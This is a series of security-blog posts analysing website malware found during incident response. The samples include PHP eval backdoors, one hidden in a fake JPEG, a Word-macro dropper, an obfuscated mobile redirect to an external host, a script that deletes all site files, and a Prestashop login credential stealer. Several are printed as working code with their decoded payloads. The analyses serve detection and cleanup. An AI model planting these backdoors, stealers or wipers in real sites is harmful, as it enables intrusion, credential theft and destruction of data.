Category: Website Malware Infections

Small One-liner Backdoor

During an incident response investigation, we detected an interesting backdoor that was small but had the potential to give the attacker full access to your website and all its content.

Let’s review the backdoor content which was placed into the wp-content/themes/newaffpower/functions.php file:

@$A='Acc';$p='_';$o='P​O';$s='S';$t='T';;@​eval​(${$p.$o.$s.$t}['​WordPass']);

The attacker placed the code at the bottom of a legit file and, when called with the required field, could allow the attacker full system access of the website.

Let’s work through the malicious code step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $A is set to ‘Acc’ but is not used during the attack:

@$A='Acc';

The attacker then created individual entries that will be combined and then executed the malicious payload:

$p='_';
$o='PO';
$s='S';
$t='T';;

The final part of the attack is where the attacker includes his malicious payload in the ‘WordPass’ POST parameter. (Looks like \'WordPress\', but even \'WordPress\' would not make it any more legitimate)

@​ev​al($​{$p.$o.$s.$t}['WordPass']);

The complete piece of malicious code would look like the string below.

@​eval​($_POST[​'WordPass']);

In the screenshot below, I’m simulating a POST request to the website in order to gain access to important files on the server.

This will execute any content passed by the attacker that could give the attacker full access to your website files/folders.

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Aug 21, 2017 by Samuel Odendaal

JavaScript Used to Generate Malicious Documents

When talking about compromised environments, we often think that the website itself is the end goal but that’s not always true. In some cases, attackers shift their focus to the user instead, especially when the website has lots of traffic.

Attackers may use different techniques and one we see often is called malware dropper. A dropper is not necessarily the malware that will cause the damage itself but its main objective is to simply download another piece of malicious code (the real malware) that will then, execute the tasks attackers wanted to achieve.

During a website investigation, we detected a few JavaScript files being executed as PHP to generate other malicious files (extension: .doc - malware dropper). You can see some of the code below. It shows the name of the file being assigned, then offered to the user for download:

lt;?php
private $contentName_ = 'EHU-96470130.dokument.doc';
private $contentType_ = 'application/msword';
public

function execute()
{
 $sp363bd2 = '.' . md5(md5(basename(dirname(__FILE__))));
 touch($sp363bd2);
 $spa7a53d = fopen($sp363bd2, 'r+');

 // content clipped, too long.

 header('Cache-Control: no-cache, no-store, max-age=0, must-revalidate');
 header('Pragma: no-cache');
 header('Content-Type: ' . $this->contentType_);
 header('Content-Disposition: attachment; filename="' . $this->contentName_ . '"');
 header('Content-Transfer-Encoding: binary');
 die(base64_decode($this->content_));
}

Additional file info:

$ file EHU-96470130.dokument.doc
EHU-96470130.dokument.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May  3 14:19:00 2017, Last Saved Time/Date: Wed May  3 14:19:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0

When running that file against virustotal, 35 out of 57 engines detected the code, (mostly as W97M.Downloader, a well-known Word Macro Trojan).

Whenever the user visited a specific page from the compromised website, the .doc file had been triggered for a download. If executed on the user’s machine, that would download another trojan giving the attacker control to the user’s OS.

It’s very important to be proactive on the security of your website because as you can see, the issues may affect much more than just ranking, SEO and online presence, but also your audience.

Aug 17, 2017 by Krasimir Konov

Mobile Malware Targets eCommerce Websites & Users

A mobile malware is a malicious software that targets mobile/smartphones, tablets and similar devices. The attacks may vary from fatal damage to the OS (bricking) to leakage of sensitive and personal information, such as credit card, saved passwords, pictures and much more.


With the constant growth of mobile users, attackers are focusing their efforts on developing malware targeting those devices. In this article, we’ll describe how we detected an interesting attack against an ecommerce platform.

During an Incident Response investigation, we identified a malicious code in a Magento installation located at the “./js/mage/cookies.js” file. Here is the snippet:

var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type="text/javascript" src="hxxp://Malicious-URL-REMOVED.com/odessa/?md2"></script>", "write"];function isMobile() {    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);    if (/android.+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i [_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {        return true    };    return false}if (isMobile() === true) {    document[_$_f51c[6]](_$_f51c[5])}

The function isMobile() checks if the visitor is using any of the predefined list of smartphones/tablets and if it matches, the user will be redirected to other malicious websites.

These other websites will prompt to install third-party software that claims to clean or speed up mobile devices, toolbars, adware or even worse, malicious URLs distributing ransomware that will lock the device and hold it hostage until you an X amount of money is paid to the attacker via bitcoin.

Depending on the attacker’s campaign, they may also redirect visitors or potential buyers to competitor websites, therefore causing a huge impact on the site owner’s revenue. Keep in mind that these attacks are not limited to Magento websites only as it may target WordPress, Joomla, OpenCart, Prestashop, and different other platforms.

To detect and prevent these issues, we highly recommend having a File Integrity Monitoring System in place and clean backups of your files/database. If your environment happens to be compromised, you’d be able to identify and promptly restore the files preventing any further damages to your online presence and SEO.

Feel free to contact us if you are experiencing a similar issue or if you have any other security concerns.

Aug 11, 2017 by Moe Obaid

PHP Script Nukes All Website Files

Most malware and spam that we come across has some sort of discernable purpose to it, usually something which benefits the attackers financially. This is often related to spam campaigns, credit card theft, spreading trojans/spyware or phishing scams. However, every so often we find something that defies this trend and is just downright evil. We found a PHP script named config-r.php in the root directory of a website that contained the following code:

<?php
//$dir = getcwd();
if ($_GET['id'] == 'red@<redacted>@delete') {
    $dir   = getcwd();
    $files = scandir($dir);
    if (@$_GET['doAction'] == 'delete') {
        rrmdir($dir);
    } else {
        echo '<br /><br /><a href="config-r.php?id=red@<redacted>@delete&doAction=delete">Yes, Delete AllFiles/Folders</a>';
    }
    echo "<br /><br />";
    echo "<pre>";
    print_r($files);
    echo "</pre>";
}
function rrmdir($dir1)
{
    if (is_dir($dir1)) {
        $objects = scandir($dir1);
        foreach ($objects as $object) {
            if ($object != "." && $object != "..") {
                if (filetype($dir1 . "/" . $object) == "dir") {
                    if ($object != 'config-r.php') {
                        rrmdir($dir1 . "/" . $object);
                    }
                } else {
                    if ($object != 'config-r.php') {
                        unlink($dir1 . "/" . $object);
                    }
                }
            }
        }
        reset($objects);
        @rmdir($dir1);
        echo '<br />Deleted All Files/Folders!<br />';
    }
}

This section of the code waits for the attacker to send a request to the php script:

if(@$_GET['doAction']=='delete')

Simply accessing this file in a web browser with doAction=delete added onto the URL and some sort of a pass code in the id parameter will recursively remove all website files and directories, effectively deleting the entire website file structure and contents. Interestingly, it does not remove the malicious php itself (config-r.php) and will remain on the server even after the big red button is pushed, so to speak.

Fortunately, the website on which we found this script was intact and the attackers had not yet nuked it into oblivion. My best guess is that whoever coded this either had an axe to grind against a particular website or just wanted to reap wanton destruction for the lulz.

If you don\'t want to leave your site existence at mercy of not so noble people, make sure you regularly back up your site and don\'t neglect website security.

Aug 8, 2017 by Ben Martin

Malicious Backdoor Hidden Inside Fake Image

During an incident response investigation, we detected an interesting backdoor that was hidden in a fake image. The attacker was quite creative in creating an attack that would work in two steps.


The attacker created two files. The first file was a normal looking php file that would include the fake image.  

Let’s review the content located in the php file: “./wp-content/themes/twentythirteen/images/3.php

<?phpinclude("check-db.jpg");?>

When looking at the code inside the file:  “./wp-content/themes/twentythirteen/images/3.php” we see a strange use of the include function that’s including check-db.jpg but that in itself is not malware.

Let’s go ahead and inspect the image "check-db.jpg". After trying to open the file in the browser it looked as if the image was corrupt, as nothing was displaying.

We then opened the file in a normal text editor and found the main source of the backdoor.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";$_A=strrev("esab")."64_".strrev("edoced");$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');$trd=strrev("taerc")."e_f".strrev("noitcnu");$ctel=$trd('$_S',$_X);$ctel($_S); ?>

Let’s work through the malicious code located inside the fake image “./wp-content/themes/twentythirteen/images/check-db.jpg” step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $_S contains all the malicious code and that will create the backdoor the attacker will use to gain access to your website.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";

The variable $_A contains the function base64_decode once it has been reversed by the strrev function. $_A before it’s been reversed by the strrev function

$_A=strrev("esab")."64_".strrev("edoced");

$_A after it’s been reversed by the strrev function$_A = "base64_decode";

The next step is where the hacker calls a base64_encoded string that will be decoded by the base64_decode function assigned to the $_A variable.

The $_X variable will be decoded by the function “base64_decode” and once complete it will contain the necessary code to execute and create the backdoor for the attacker.

$_X before it’s decoded by the “base64_decode” function

$_X = $_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');

$_X after it’s been decoded by the “base64_decode” function

$_X = base64_decode(eval(gzinflate(base64_decode($_S))));

The variable $trd contains the function create_function but it needs to be reversed in order to be used.$trd before it’s been reversed by the strrev function

$trd=strrev("taerc")."e_f".strrev("noitcnu");

$trd after it’s been reversed by the strrev function

$trd  = “create_function”;$ctel$trd=“create_function”;$ctel=$trd('7Rpdb...',base64_decode(eval(gzinflate(base64_decode($_S)))););$ctel($_S);

Now the following variables $trd & $ctel will combine and execute all the functions to give the attacker full access to your website files/folders.


If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Jul 17, 2017 by Samuel Odendaal

Protecting Phishing Pages via .htaccess

Phishers usually want to protect their pages from being detected by search engines and security companies. To achieve that, they add .htaccess files that deny access to their phishing directories from known IP addresses and networks. Depending on the scenario, if they are targeting a specific type of service (online banking for instance) attackers may allow only a set of visitors from a specific country to see that phishing page.


Though  attacker’s skillset may vary, some will just try to customize third-party scripts they find online and it’s not uncommon when they do it poorly. For example, one phishing campaign uses a bot blocking .htaccess file that can be easily found on the Internet. It really protects sites from unwanted bots, but has very little to do with search engines, security companies, and geographic regions (although it blocks some of them) - it just saves bandwidth.

deny from 216.163.255.1 # rpa.metlife.com bored employees
deny from 67.127.164.125 # DSL bandwidth waster
deny from 193.253.199. # france SE art-online.com bandwidth waster
deny from 80.179.254. # clown from Israel using downloader
deny from 64.37.103. # spambots and other non customers
deny from 69.61.12.100 # spambot from servershost.net

Along with the .htaccess file, there may be other files within the phishing structure, such as:  

  • Image directories (img/images) - These directories may contain logo, header/footer images & others related to phishing (Paypal, Banks, etc.).
Jul 11, 2017 by Yuliyan Tsvetkov

A Simple Prestashop Login Swiper

In a compromised environment, attackers may inject malicious code into different files, including the core of different CMSs, in order to maintain access to the website and/or obtain sensitive data. Although these issues are very simple to be identified and remediated, not all users constantly monitor their websites for such file integrity breaches.


One of these injections is known as credential stealer, which consists of intercepting the authentication mechanism and saving the username/password either into a file or sending it via email to the attacker.

During an Incident Response process, we found a malware of this category injected in the Prestashop file “./controllers/AuthController.php”. Here is the snippet:

if (Tools::isSubmit('SubmitLogin'))     {        Module::hookExec('beforeAuthentication');        $passwd = trim(Tools::getValue('passwd'));        $email = trim(Tools::getValue('email'));        if (empty($email))           $this->errors[] = Tools::displayError('E-mail address required');...        elseif (Tools::strlen($passwd) > 32)           $this->errors[] = Tools::displayError('Password is too long');        elseif (!Validate::isPasswd($passwd))           $this->errors[] = Tools::displayError('Invalid password');        else        {strong>eval(gzinflate(base64_decode('bY7fCoIwHIXvBd9BfnihIL5AJkiuuilj2R+IGGYbLsyNzVDI3j016Kbuzsf5OBzOHPao8pqLitCW61o7wISkFbju0zRsJqcjOhDdsnYmqlqJsqTKl4UEDzJwJ6bBGsVr6vHSB6vrLPBtmWndXL9ItgjvET7BMk035EjmCT5EOEbxkOD862G0SlJEojj+W48zu55ItEDrdFCCiwqDQoWfZ3kp9PhsoNcb')));           $customer = new Customer();           $authentication = $customer->getByEmail(trim($email), trim($passwd));           if (!$authentication OR !$customer->id)

]

The obfuscation code is a very common technique used by attackers to hide the malicious code, but most scanners will trigger an alert for files containing a combination of eval() and base64_decode() string.

When decoding it, we could see the following snippet:

if(function_exists("fopen")){$fp=fopen("AjaxController.php","a");fwrite($fp, $email." || ".$passwd." || ".$_SERVER["HTTP_X_FORWARDED_FOR"]." || ".$_SERVER["REMOTE_ADDR"]." || ".$_SERVER["HTTP_USER_AGENT"]."<br><hr>");fclose($fp);}

The code above will run whenever a user tries to authenticate on Prestashop’s backend, dumping sensitive data, such as email, password, IP address and user agent into the file AjaxController.php.

From there, all the attacker has to do is download this file to get a list of credentials and take control over the site to create bogus users, change payment info, and/or perform all different kinds of malicious activities.

On a previous blog post about another credential stealer, we showed how an attacker can send stolen credentials to an email address. The case described in this article though tends to be simpler and more reliable because there's no need for an email account in order to be successful.

To prevent such attacks, keep your Prestashop site and modules always up to date and remember to monitor your core files. If you suspect that your site has been compromised and needs specialized assistance, our security analyst at https://sucuri.net will be glad to help.

Jul 7, 2017 by Conrado Torquato